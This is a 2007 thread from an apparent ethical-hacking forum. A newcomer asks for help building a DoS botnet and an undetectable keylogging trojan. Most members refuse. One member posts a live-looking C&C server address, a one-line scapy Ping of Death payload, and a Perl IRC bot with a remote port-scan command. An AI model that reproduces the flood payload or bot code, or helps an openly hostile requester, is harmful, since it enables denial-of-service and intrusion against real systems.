.

need a complt tutorial about designing botnets

<<

proudindian

Newbie
Newbie

Posts: 32

Joined: Mon Dec 10, 2007 3:24 am

Post Mon Dec 10, 2007 3:16 pm

need a complt tutorial about designing botnets

helloo..i need a good tutorial 2 design botnets which can perform denial service attack.like icmp flood,syn attack..etc etc
please help.........

and a good undetecteble troajn.attached keylogger please help me....
<<

slimjim100

User avatar

EH-Net Columnist
EH-Net Columnist

Posts: 385

Joined: Wed Nov 08, 2006 12:50 pm

Location: Atlanta

Post Mon Dec 10, 2007 3:48 pm

Re: need a complt tutorial about designing botnets

You are in the wrong place and might want to not post here.... This is Ethical Hackers Network.... We do not assist in any illegal activity.

Brian
CISSP, CCSE, CCNA, CCAI, Network+, Security+, JNCIA, & MCP
<<

Kev

Sr. Member
Sr. Member

Posts: 428

Joined: Sat Sep 29, 2007 12:26 pm

Post Mon Dec 10, 2007 4:14 pm

Re: need a complt tutorial about designing botnets

I think some people must believe we assume everyone that comes here is ethical so we are more than happy to give up information like what was requested. 
<<

LSOChris

Post Mon Dec 10, 2007 6:32 pm

Re: need a complt tutorial about designing botnets

there are some writeups on agobot (sp--think thats it) that would be a good place to start
Last edited by LSOChris on Mon Dec 10, 2007 8:15 pm, edited 1 time in total.
<<

dean

Post Mon Dec 10, 2007 8:12 pm

Re: need a complt tutorial about designing botnets

It seems to me that most people are assumed to be unethical when posting about topics like this here. The request does seem a little suspect though.

Anyway, bonets are a valid field of research. I do a substantial amount of work within this field myself.

So, proudindian, you might want to look into how botnets work first off. From traditional IRC based, Single Command & Control Server types to more advanced Peer-to-Peer and Hybrid-P2P botnets. Look into fast-flux and DNS round robin techinques (The Storm Worm is a nice example). As for a bot with keylogging activities, here is a C&C server that sends just that command (.keylog) to each client. (205.234.132.29 port:53) Perhaps you can figure out how to retrieve the bot and reverse it.

http://www.usenix.org/events/hotbots07/ ... g/wang.pdf - A nice article about advanced botnet design. It's not a HOWTO but hey, if you're planning on building a botnet you had better learn how to write them first.

dean
<<

proudindian

Newbie
Newbie

Posts: 32

Joined: Mon Dec 10, 2007 3:24 am

Post Tue Dec 11, 2007 12:55 am

Re: need a complt tutorial about designing botnets

thanx dean,and no,i just wanna clear my concept here about botnets,i am not telling you people to xplain de mechanism of ur bots nd algo of dere source so dat i can atleast hex edit dem if i want to do some amendments,i will do it myself...i am a lerner here.

and no.sorry if you think that its illegal,and for keylogger iasked because i was having problem with winsock based smtp..for keylog.txt

but its okk now....its such a good site with loads of infos....i am thankfull to you people...

and with irc it connects via 6667..infact it connects from 6660 to 6669..depends on admin programms,
and another thing can sum1 design his bots those which can do icmp flood,syn attack as well as tsunami....dis is possible??

please clear my concept or give me any tutorial link where from i can get all descriptions and alogo or source code of botnets..dat i can study it ....thanx in advance
<<

dean

Post Tue Dec 11, 2007 10:27 am

Re: need a complt tutorial about designing botnets

proudindian, you can run an ircd over any port you choose. the ip address i posted previously used tcp/53 as most firewalls will allow tcp/udp 53 outbound for DNS.

Yes, you can have your bot do pretty much anything you want. DoS attacks, etc...

Look into how packets need to be crafted for the various attacks. Not that this would be the best language for a bot but it's what I'm playing with at the moment so... using python and scapy you can build a Ping of Death attack in one line.

send( fragment(IP(dst="IPADDR")/ICMP()/("X"*100000)) )

There are many case studies and sites with bot source code. Google.

dean
<<

EmanoN

Newbie
Newbie

Posts: 41

Joined: Wed Sep 12, 2007 3:37 pm

Post Tue Dec 11, 2007 3:24 pm

Re: need a complt tutorial about designing botnets

dean wrote: The request does seem a little suspect though.
dean

A little?  Your joking right? I am glad you are not in charge of security where I do my banking, ha ha. Sorry, I just could not resist. But hey, thats cool if you are going to help anyone that comes here build botnets and undetectable trojans.
Last edited by EmanoN on Tue Dec 11, 2007 3:28 pm, edited 1 time in total.
<<

LSOChris

Post Tue Dec 11, 2007 5:05 pm

Re: need a complt tutorial about designing botnets

i would have thought the guy who's picture was next to the word hacker would be more than ready to help someone build a bot

here are some vids to watch to help you out:
http://video.reverse-engineering.net/index.php?cat=7
Last edited by LSOChris on Tue Dec 11, 2007 8:49 pm, edited 1 time in total.
<<

dean

Post Tue Dec 11, 2007 10:33 pm

Re: need a complt tutorial about designing botnets

Really? I'm helping him to build a botnet? All the information I've posted is available through this thing called a search engine. You might want to try one sometime.

How is it when someone posts a question about virii, botnets, anything considered by the individuals on this site to be the "dark side" and not part of "ethical hacking" they feel the need to immediately post something to that effect. What right do you or anyone on this site have to make the judgement that the person is intending to do something illegal. As proudindian posted, he is looking to learn. Whether or not this is the truth, I don't really care and neither should anyone else. Who are we to infer that he is lying and attempting to gather information for illegal purposes? He can easily google for anything he needs.

If all the people who post about how unethical some questions are, are so concerned about people using this information for anything but the ethical purposes, then perhaps they should take a different route and actually attempt to find out what person is looking to learn/do rather and explain the legal ramifications of such activites. Additionally, the information posted might enlighten some of the readers about the inner workings of that field/technology. Botnets in this instance.

Would it make a difference if proudindian had started his post with "I want to be an 'ethical' hacker and I'm interested in botnets, detecting and tracking them"? Also, perhaps english is not his first language. The reality is that whatever his motivations are we don't have the right to tell him otherwise. Perhaps if there is such a standard of ethics on this site then those persons who feel strongly enough should attempt to guide this person accordingly rather than making presumptions and accusations? Perhaps keeping them on this site is the first step rather than driving them away. I have yet to see anyone reference anything explaining the dangers of running a botnet.

here are a few examples:

http://www.sans.org/newsletters/newsbit ... =47#sID200 - The FBI's Botroast.
http://www.securityfocus.com/brief/567 - Germany's 202(c) anti hacking law.

So I will continue to post on topics that people here consider unethical. Perhaps someone might learn something.

proudindian you seem to have the hang of winsock so perhaps this is too simple but here is a snippet of an IRC bot in perl. It will perform Google searches in the channel. It's not all the code but it gives you an idea. I wrote it using IO::Socket rather than POE::Component::IRC and Bot::BasicBot::Pluggable modules.

  Code:
use strict;
use warnings;
use IO::Socket::INET;
use Switch;

my $server = $ARGV[0];
my $chan = $ARGV[1];
my $port = '6667';
my $nick = 'google-bot';
my $user = 'bot dbot bot bot';
my $owner = 'name';
my $pass = '***';

my $socket = IO::Socket::INET -> new (   PeerAddr   => $server,
                              PeerPort   => $port,
                              Proto      => 'tcp',
                              Type      => SOCK_STREAM,
                              Timeout      => '10') || print "I died.\n";

print $socket "User $user\r\n";
print $socket "NICK $nick\r\n";
print $socket "privmsg nickserv IDENTIFY $pass\r\n";
print $socket "JOIN $chan\r\n";
print $ARGV[1];

my $a;
while ($a = <$socket>) {
   if ($a =~ m/^\:(.*?)\!(.*?)\@(.*?) PRIVMSG (.*?) :(.*?)$/) {
      my $unick = $1;
      my $uident= $2;
      my $uchost =$3;
      my $uchannel =$4;
      my $utxt = $5;

# String is parsed for the valid query.
      if ($a =~ m/\!google/) {
         if ($unick =~ $owner) {
            my @query = split (" ", $utxt);
            my $n = 1;
            my $google_query;
            my $query;
            while ($query[$n]) {
               $google_query .= $query[$n];
               $google_query .= "%20";
               $n++;
            }

# Open socket to www.google.com.
            my $result = IO::Socket::INET -> new ( PeerAddr => 'www.google.com',
                                          PeerPort => '80',
                                          Proto   => 'tcp',
                                          Type      => SOCK_STREAM,
                                          Timeout   => '5') || print "An error occured.\n";

#Submit the search terms for the google query.
            print $result "GET /search?num=5&hl=en&lr=lang=en&q=$google_query&btnG=SEARCH HTTP/1.0\n";
            print $result "Host: www.google.com\n\n";

#Get the results from the search term and parse for valid urls. Also remove %20 from the search string when displaying it to the user.
            my $get;
            my @search = split ("%20", $google_query);
            my $term = join (" ", @search);
            while ($get = <$result>) {
               $get =~ m!(<div class=g><h2 class=r><a href=\")((http\://|https\://|ftp\://)|(www.))+(([a-zA-Z0-9\.-]+\.[a-zA-Z]{2,4})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(/[a-zA-Z0-9%:/-_\?\.'~]*)?\"!;
               print $get;   
               print $socket "privmsg $uchannel : Search Term: $term || Result : $3$4$5$8\n";
            }
         }
      }
# basic check to see if port is listening on remote address. A simple connect scan.
if ($a =~ m/\!scan/) {
   my ($ip, $tport, $res, $scan);
   
   if ($unick =~ $owner) {
      
      my @target = split (" ", $utxt);
      $ip = $target[1];
      $tport = $target [2];
      
      $scan = IO::Socket::INET -> new ( PeerAddr   => $ip,
                                PeerPort   => $tport,
                                Proto      => 'tcp',
                                Type      => SOCK_STREAM,
                                Timeout   => '3') || print " An error occurred. Die!\n";
      
      if ($scan) {
         $res .= "Open";
         close ($scan);
      }
      else {
         $res .= "Closed";
      }
         $res .="\n";
      }
   
      print $socket "privmsg $uchannel : Target: $ip : $tport || Result: $res\n";
}
                           
if ($a =~ m/\!owner/) {
   my @says = split (" ", $utxt);
   my $say = $says[1];
   
   if ($unick) {
      print $socket "privmsg $uchannel :$owner is my master!\n";
   }
}
<<

sedated

User avatar

Newbie
Newbie

Posts: 37

Joined: Sun Oct 07, 2007 11:36 pm

Post Tue Dec 11, 2007 10:58 pm

Re: need a complt tutorial about designing botnets

  Unfortunately it sometimes hard to tell if someone plans on using any information here in a unethical manner there is no easy way to tell unless its one of those obvious post like tell me how to hack into my school.I do believe
though we should be careful and scrutinize post if unsure of the users intentions we can simply ask them granted any body who can use Google will eventually find what they need with a little perseverance.I myself would rather play on the safe side when i am unclear of a posters intentions.
<<

proudindian

Newbie
Newbie

Posts: 32

Joined: Mon Dec 10, 2007 3:24 am

Post Wed Dec 12, 2007 1:31 am

Re: need a complt tutorial about designing botnets

thanx everyone,believe me i am tring to learn these things,but i thought i posted it on wronge way,my intention was not this to harm any1 or doing something illegal,sorry for that again.  :'(
<<

dean

Post Wed Dec 12, 2007 8:07 am

Re: need a complt tutorial about designing botnets

Don't worry about it and keep asking questions.  :)

-dean
<<

don

User avatar

Administrator
Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Wed Dec 12, 2007 9:15 am

Re: need a complt tutorial about designing botnets

By all means, keep asking questions. I'm sure you can understand the community being a little gun shy, but their intentions are good. I try my best to keep this a community for security professionals, and they've all got my back. For that I am grateful.

Soo keep it going on both sides. Keep the quality of information high and look out for the integrity of the site. This can sometimes be a tough balance, but I think we do pretty well.

Thanks everyone,
Don
CISSP, MCSE, CSTA, Security+ SME
<<

proudindian

Newbie
Newbie

Posts: 32

Joined: Mon Dec 10, 2007 3:24 am

Post Wed Dec 12, 2007 1:10 pm

Re: need a complt tutorial about designing botnets

yes,thanx for support everyone.....i feel proud for being a member here in this community. :)
Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software